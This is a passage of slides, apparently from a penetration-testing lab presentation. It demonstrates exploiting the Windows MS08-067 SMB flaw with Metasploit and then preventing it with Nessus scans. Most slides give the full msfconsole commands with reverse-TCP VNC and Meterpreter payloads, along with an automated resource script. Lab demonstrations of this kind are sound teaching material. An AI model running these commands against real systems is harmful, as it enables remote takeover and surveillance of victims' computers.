  • 5. Launching the Attack (visual) Result ===> Victim OS everything user does on this computer is visible to the attacker once the exploit is successful Attacking System Everything victim does is seen from Kali Linux using TightVNC console.Exploit Code: > sudo msfconsole > use exploit/windows/smb/ms08_067_netapi > set target 0 > set rhost 192.168.1.9 > set lhost 192.168.1.6 > set lport 4321 > set payload windows/vncinject/reverse_tcp > check > exploit
  • 6. Attack continued(console) Using MeterPreter Exploit Script > sudo msfconsole > use exploit/windows/smb/ms08_067_netapi > set target 0 > set rhost 192.168.1.9 > set lhost 192.168.1.6 > set lport 4321 > set payload windows/meterpreter/reverse_tcp > check > exploit ● Different than previous one ● Has access to the command line ● Can create/delete or even execute new scripts or command
  • 7. Automating the Attack Using bash script to automate the attacks requirement: > script needs to be created at specific folder of metasploit framework. > script once written can be invoked with msfconsole command. ----------------------------------------------------------------- > go to location: usr/share/metasploit- framework/scripts/meterpreter > create a file meterpreter.rc using nano or touch > include the following script: use exploit/windows/smb/ms08_067_netapi set target 0 set rhost 192.168.1.9 set lhost 192.168.1.10 set lport 4321 set payload windows/vncinject/reverse_tcp exploit
  • 8. Automating the Attack (2) Using python to automate attack complex requirement: > need to download correct library to initiate attack. > package is msfrpc from github > execute similar action as from bash scripting ----------------------------------------------------------------- Difference from Bash Script: > Difficult to implement. > Depends on python version. > Code cannot be run in other system without setting up complete environment. Initializing the attack
  • 9. Preventing the Attack Scanning for Vulnerabilities using Nessus > scan the device (provide IP to Nessus) > run the scan > drill down on the critical and high vulnerabilities > read the description and adopt the solution suggested
  • 10. Conclusion ● Security is evolving process. ● New vulnerabilities are introduced each day ● Penetration and scanning helps you see what’s wrong with your system ● Helps you understand what can be done once the exploit is executed ● “Best defense can only be implemented once you know your weakest point”